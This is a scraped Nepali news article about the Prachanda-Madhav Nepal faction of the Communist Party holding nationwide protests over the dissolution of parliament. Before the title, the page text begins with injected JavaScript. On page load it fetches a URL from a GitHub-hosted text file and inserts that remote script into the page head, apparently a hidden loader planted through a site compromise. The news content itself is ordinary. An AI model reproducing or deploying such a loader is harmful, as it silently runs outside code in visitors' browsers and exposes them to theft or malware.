;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज प्रचण्ड नेपाल समूहले देशब्यापी प्रर्दशन गर्दै – जुनेली न्युज
बिहिबार, असार २०, २०८२
  • होमपेज
  • आज प्रचण्ड नेपाल समूहले देशब्यापी प्रर्दशन गर्दै
राजनीति

आज प्रचण्ड नेपाल समूहले देशब्यापी प्रर्दशन गर्दै

पुष १४,

काठमाडौं । नेपाल कम्युनिष्ट पार्टी (नेकपा) पुष्पकमल दाहाल प्रचण्ड-माधवकमार नेपाल समूहले मंगलबार (आज) देशब्यापी प्रर्दशन गर्दैछ ।

प्रधानमन्त्री एवं पार्टी अध्यक्ष केपी शर्माले हठतमा संसद् बिघटन गरेको भन्दै टुक्रिएको प्रचण्ड-नेपाल समूहले पहिलो पटक देशब्यापी प्रर्दशन गर्न लागेको हो । यस अघि काठमाडौंमा हामी यहाँ छौं भन्दै प्रचण्ड-नेपालसहितका नेताहरुले सडकबाट आन्दोलन गरेका थिए ।

त्यस यता निरन्तर ठाउँठाउँमा प्रर्दशन गर्दै आएको समूहले आज वृहत प्रर्दशन गर्ने तयारी रहेको जनाएको छ ।

फेसबुक प्रतिक्रियाहरु